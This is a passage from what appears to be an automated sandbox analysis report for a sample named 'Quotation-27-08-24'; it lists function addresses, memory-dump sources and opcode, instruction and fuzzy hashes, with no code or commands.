                                          • Instruction ID: 28cb6e44c56bf818d7e3ee07d54c1cc1ec1ad8e0ab2be5e4ee6eead88065a05d
                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                          • Instruction Fuzzy Hash: 86110232A00640EFDB209F46EC41B1AB7E5EF45760F058428F8089B161EB74DE44FB90
                                          Function 00F827ED Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c5111eebb391756819442a0895355f5c6324e8f9dbe0b1534e98d23d3d5fd09
                                          • Instruction ID: 0447079079bb949c160d4299cebdd98a75d116572c6e102f05d25344d96503c6
                                          • Opcode Fuzzy Hash: 9c5111eebb391756819442a0895355f5c6324e8f9dbe0b1534e98d23d3d5fd09
                                          • Instruction Fuzzy Hash: ED012672B05649AFE726A26ADD45F67779CEF803A4F15407AF8018B641DB18EC00F3A2
                                          Function 00F64690 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8aea84e2d38bfeae8cc8d761f2e6e622ff774923392d7b1809b3e65efe01221f
                                          • Instruction ID: a460a8941362b7b36220069f623e64cbdf098ff7d7ef48ae48817c369c67e9c8
                                          • Opcode Fuzzy Hash: 8aea84e2d38bfeae8cc8d761f2e6e622ff774923392d7b1809b3e65efe01221f
                                          • Instruction Fuzzy Hash: 8511CB76640644AFCB25EF59D980F567BA8EB9AB75F18411AF804CB290C774FC40EFA0
                                          Function 00F96620 Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2d763824cc6439d24d2ec5ef254c23fa69077ecd304c063519a5d4959d9fa92
                                          • Instruction ID: ec46789681bfdc149ce18759a00d4e018c932bb98b7c597d4a3a5875facf19e6
                                          • Opcode Fuzzy Hash: d2d763824cc6439d24d2ec5ef254c23fa69077ecd304c063519a5d4959d9fa92
                                          • Instruction Fuzzy Hash: 6111C272D00714ABEF22DF69CD81B5EF7B8EF84B50F500059E904BB201D735AD01AB50
                                          Function 00F8EA2E Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343d6f2c588d44df85538af5a468ce36deb4de78a3be438328df6034640cc481
                                          • Instruction ID: 90b86af32df76d6d816d7eb4a10b723a1414bfb0c7af4155bbbad7501fd2f0e3
                                          • Opcode Fuzzy Hash: 343d6f2c588d44df85538af5a468ce36deb4de78a3be438328df6034640cc481
                                          • Instruction Fuzzy Hash: 5B01B5716002089FC729EF15DD49F66BBF9FB85724F24816AF0058B261D778EC46DB90
                                          Function 00F8E53E Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction ID: a71f9f883dc2618a9339ae76b68241a122f5fc62b7bab10c8404c858539a7481
                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                          • Instruction Fuzzy Hash: 9F112932A016C69BD7229718CE45F65B794EB01768F2D00B5ED05CBA42E33CCC45F311
                                          Function 00FEE75D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction ID: e5365750b3ef32ed26c143df5fb4d9f85b1c7a922006a15aaad04d6cb5cba7d9
                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                          • Instruction Fuzzy Hash: B9016832A00144AFD7219F56DC00F5A77A9EF49B60F098034F8148B260E775DD40F790
                                          Function 00F5A250 Relevance: .1, Instructions: 52COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction ID: 2b18dd1b9983162f2848a7d116fc4c926b31a80bf9c7858d8eda6934686f5214
                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                          • Instruction Fuzzy Hash: A3012672814B11AFCB308F15EC41A327BA4EF55B71B008A2DFD958B281C735D825EB61
                                          Function 00FDE1D0 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ba60edb3e0dae04a7901c6e9f7b9a19ab6fef92b0a14b06cc200f597eefd057
                                          • Instruction ID: 26fa85db034aec4717339216a7f6f492a80bbf6ab4fee4564a383f70f7981ca5
                                          • Opcode Fuzzy Hash: 8ba60edb3e0dae04a7901c6e9f7b9a19ab6fef92b0a14b06cc200f597eefd057
                                          • Instruction Fuzzy Hash: BC11AD32641240EFCB16EF19DD91F56BBB9FF44B94F2400A9F9059F662C239ED01EA90
                                          Function 00F66259 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 695ba77d71ac53381f6d5a3ea68c96ef6310192688ef098c7529db1be3fe7526
                                          • Instruction ID: 13a55ba757a94c84cd3856e76a518ce5f82bed85e42e0fd8c5177dc7cd3bb704
                                          • Opcode Fuzzy Hash: 695ba77d71ac53381f6d5a3ea68c96ef6310192688ef098c7529db1be3fe7526
                                          • Instruction Fuzzy Hash: 32119EB0A01218ABDF65AB64CC52FE9B374AB44710F5041D4B318E60E1DB349E81EF94
                                          Function 00F6208A Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction ID: 2f91067926b6205593ae4cb243340d309b0e8c735b4fa965f0989207941f9325
                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                          • Instruction Fuzzy Hash: 7D014733A00501ABDF509E29DC80F92B76ABFD4720F1945A9EC05CF246DA71CC81F790
                                          Function 00FE6050 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e2b7e16f0db1b91716dae646211f05fd8197f53189f9c0529e19e6d869de801
                                          • Instruction ID: 94bc9a76d849781684c727e0411fed12b505899e3880c32a5b87e01d5313ce22
                                          • Opcode Fuzzy Hash: 7e2b7e16f0db1b91716dae646211f05fd8197f53189f9c0529e19e6d869de801
                                          • Instruction Fuzzy Hash: 7711177390011DABCB11DB95CC81EEFBB7CEF48358F044166A906E7211EA34AA15DBA1
                                          Function 00FF6500 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b420344da0dd6e814a7d2ad949e1ed22a5f5157a4275b4931e151805e4253220
                                          • Instruction ID: 49d66d483ec11dfe82f6c1729ce8347ce756b4a20e357a000d0983e0e017842b
                                          • Opcode Fuzzy Hash: b420344da0dd6e814a7d2ad949e1ed22a5f5157a4275b4931e151805e4253220
                                          • Instruction Fuzzy Hash: 7D118E326441499FC710CF68D850BA6BBB9FF5A314F1C8159E948DB325DB32EC85EBA0
                                          Function 00FEC810 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ac6f49ba5b8a3aa09d84f6637961f0359a3765059aff71e889462b1e7fa88e6
                                          • Instruction ID: 951d0e423b90921019c3227eb5aa9e8962d62f7393a769fb340982352f0f4892
                                          • Opcode Fuzzy Hash: 6ac6f49ba5b8a3aa09d84f6637961f0359a3765059aff71e889462b1e7fa88e6
                                          • Instruction Fuzzy Hash: C211ECB1E01249ABCB04DF9AD541A9EB7F4EF48350F10806AB905E7351D674EE019BA4
                                          Function 0100EA60 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cff49607da137a181fbdbce6db9b1cbe1cb58ddaef90f27a3ccc70fb7156da1a
                                          • Instruction ID: 0f670f85fa10c3814e36f55aed98f3564bac4d6b2534485def077c4db91c00cb
                                          • Opcode Fuzzy Hash: cff49607da137a181fbdbce6db9b1cbe1cb58ddaef90f27a3ccc70fb7156da1a
                                          • Instruction Fuzzy Hash: 2501F5315402109FD773AA14C800D2BBBE9FF46790F14886AF5852B682CB34AC81DB92
                                          Function 00FA20F0 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9edefc854191c57c543d92bd17aa0356ed633c6edf8084241e94cbbcca3fc5be
                                          • Instruction ID: a4caf32feb1dc26a0fab79aea5b66cbbeea2940a5a6098c92b8b3768067177bc
                                          • Opcode Fuzzy Hash: 9edefc854191c57c543d92bd17aa0356ed633c6edf8084241e94cbbcca3fc5be
                                          • Instruction Fuzzy Hash: 6611ADB1A0020CABCB00DF64CC41FAE7BB6EB45350F004059F91597281DB35AE01EB91
                                          Function 00F5C020 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction ID: 06a58d3295dcf982fddc712483e1af14040a1853fc850ab0f65036f6c2082667
                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                          • Instruction Fuzzy Hash: 5C01F532600705DFDF32A666C840FA773E9FFC4320F188419AA46CB580EA74E805EF91
                                          Function 00F9E5CF Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cec476b049e806be8da27fb425d04b58751edcfe6c08317baa258eb4bfd378a7
                                          • Instruction ID: 7b819eee01a894c8d6e21a03570c2ea4c8be408ccb6c935f03037b6121642892
                                          • Opcode Fuzzy Hash: cec476b049e806be8da27fb425d04b58751edcfe6c08317baa258eb4bfd378a7
                                          • Instruction Fuzzy Hash: 4E01F272200A00BFD351BB79CD81E67B7ACFF857A0B04462AB50883652DB68EC01E6E1
                                          Function 00FF69C0 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 011c945839edade1a73e164246b03cb7a09015945e5345ce155ae4e51ccedf33
                                          • Instruction ID: 8d3d39d33f8f20263bc34388c4a7b328a8a9ab4e848ccbeef6666cc19aecb365
                                          • Opcode Fuzzy Hash: 011c945839edade1a73e164246b03cb7a09015945e5345ce155ae4e51ccedf33
                                          • Instruction Fuzzy Hash: BF014C322243059BC320DF68C849A77F7A8EF84734F204229F968D7191EB38AD01E7D1
                                          Function 00FEC460 Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82991bfd5e740cc531b621bdc981130b782cb70485e4535081670880ed146f98
                                          • Instruction ID: 0a78210efa80fcf482c42b03f750313c9edf3c15e785adadb7fb5915949deb02
                                          • Opcode Fuzzy Hash: 82991bfd5e740cc531b621bdc981130b782cb70485e4535081670880ed146f98
                                          • Instruction Fuzzy Hash: 2A116D71A0124CEBCB15EF65C851EAE7BB5EB88350F004059FC0197381DB39EE12EB90
                                          Function 00FEC97C Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a61d038dfdea578a223fc01001d66c493ebd5d3d4191159e57d8ab9c328f12c1
                                          • Instruction ID: 9a2dc9b9861f4c56ca9a0ba98caa50871c494ea983aeafb76d12ca256f3bf7c1
                                          • Opcode Fuzzy Hash: a61d038dfdea578a223fc01001d66c493ebd5d3d4191159e57d8ab9c328f12c1
                                          • Instruction Fuzzy Hash: 601179B16083489FC700DF69C842A5BBBE4EF89310F00851AB998D7392E634E901DB92
                                          Function 00FECA11 Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 435a0c51aa104185d99fb0f30bd90dfa3d96271555f073fa0a377df298df0714
                                          • Instruction ID: 915c8f55a3c44b5b677ba7fa49adeb5c3485400a1f043288b397ab4b4c6362f4
                                          • Opcode Fuzzy Hash: 435a0c51aa104185d99fb0f30bd90dfa3d96271555f073fa0a377df298df0714
                                          • Instruction Fuzzy Hash: 6B118BB16093089FC310DF6AC841A4BBBF4EF89750F00852EF998D73A1E634E901DB92
                                          Function 01034A80 Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                          • Instruction ID: 8ffe06204577f904f28716641b1e1547ca1c9b3e84d135ed9e1f1bddf88735c7
                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                          • Instruction Fuzzy Hash: 2001D432204A059FD7219A69DC45F96BBEEFFC6210F084859E682CF650DAB4F842C794
                                          Function 00F7E016 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction ID: 8662417019427284e3afff8614da772a8bae3332fa3f407229b01a60622cbf16
                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction Fuzzy Hash: 3F0184326045849FD322871DC948F6677DCEF4A764F0D44A7F909CB691D7B8DC40E622
                                          Function 00F5826B Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03c830f71fd4c0d838c50f825156a1b9969e284d9113f427fc1eeabf89d175b5
                                          • Instruction ID: c09feb796e9357a08f121164f639cc07cf3cf2729d40496bd2d5ab9de39e4a73
                                          • Opcode Fuzzy Hash: 03c830f71fd4c0d838c50f825156a1b9969e284d9113f427fc1eeabf89d175b5
                                          • Instruction Fuzzy Hash: B701D432B006049FC714DB66DC019AF7BA9FF803A0F154029AE01A7246DE70ED06E691
                                          Function 0100EB50 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 21824236ad9f35e94ca7670197a1b78aa1fa3fe930b7a8e64c30a42fe8c2c0ea
                                          • Instruction ID: 080b01a77869da10eecb1856487d4a9479c48a62504de75c9b9b6755cb1cd731
                                          • Opcode Fuzzy Hash: 21824236ad9f35e94ca7670197a1b78aa1fa3fe930b7a8e64c30a42fe8c2c0ea
                                          • Instruction Fuzzy Hash: CC01F271640B04AFE3325F19DC01F07BBA8EF45B90F10482AB6899F391D6B5D8408B64
                                          Function 00F62582 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e4e40bd55a77b8f2cc311f76781610793c76b37f63ad448394dd727207572de
                                          • Instruction ID: 471bc832361de14dd4b89ab783cdae32401dbb818f8d486274b29c1310e94c2f
                                          • Opcode Fuzzy Hash: 6e4e40bd55a77b8f2cc311f76781610793c76b37f63ad448394dd727207572de
                                          • Instruction Fuzzy Hash: 2DF0F433B41A20B7C7319B56CC40F47BAA9EB84BA0F144429B50A97640CA34ED01EBA0
                                          Function 00F8C073 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction ID: 889f677a25e06575ce3c4c3e4bdc13ca5ed9ebf34caa8e7f3310cb17c09a2c2a
                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction Fuzzy Hash: 52F0C2B2A00A10ABD324DF4DDC41E57F7EADFC4B90F048129B649C7220EA71DD04CB90
                                          Function 00F5C310 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction ID: d6552166c766f6d2a8b5aa8fafb7760724c72334f5a9e111d6727829fe127a91
                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction Fuzzy Hash: A5F04C33204B329FC73217594C40B2BB6D58FC1B62F194035FB0B9B200C9A48C09B6D1
                                          Function 00F9CA6F Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                          • Instruction ID: db6ae9ebd86aca9a3f4afd2f11dfbf2f5be4910748915d98f30d1e0aafbad7fd
                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                          • Instruction Fuzzy Hash: D401F932600689ABD732D719CC05F59BB99EF42760F0C80A6FA04CB791DB7CCD01E251
                                          Function 010361E5 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1777c6a642cbbff32f122f8c3fbb723902c3c02e209ce82fd65e555aae6d042
                                          • Instruction ID: 9143be54484fe333624e26b6c68e7f764eba71bbcca4f76944adad804a879396
                                          • Opcode Fuzzy Hash: e1777c6a642cbbff32f122f8c3fbb723902c3c02e209ce82fd65e555aae6d042
                                          • Instruction Fuzzy Hash: 8D018FB1A00648ABCB00DFA9D841AEEBBF8EF48310F14405AF504A7380D778EB01CBA5
                                          Function 00FE63C0 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                          • Instruction ID: 57b1d86762c10605213428c5351a2814647c0f26185ca1b4ba9399d4dd2d020d
                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                          • Instruction Fuzzy Hash: E1F06D7220001DBFEF029F94DD81DAF7BBDEB583D8B104125FA00A2061D235DE21ABA0
                                          Function 00FEA4B0 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1e8118d11bed82eded1d675157cd24954ec4eec347bc8348eda953c55154012
                                          • Instruction ID: 01136591903c54f66c88768500b6a41e79996c83c9f48c53b4b66716b2159965
                                          • Opcode Fuzzy Hash: a1e8118d11bed82eded1d675157cd24954ec4eec347bc8348eda953c55154012
                                          • Instruction Fuzzy Hash: 2F019736510259EBCF129F94DC40EDE3FA6FB4C764F0A8105FE1866224C236E970EB92
                                          Function 00F5C0F0 Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b66e08d2e428dfa314b04fba972a4a6a21851cbd6f28c6f29dc36446b34ed2a5
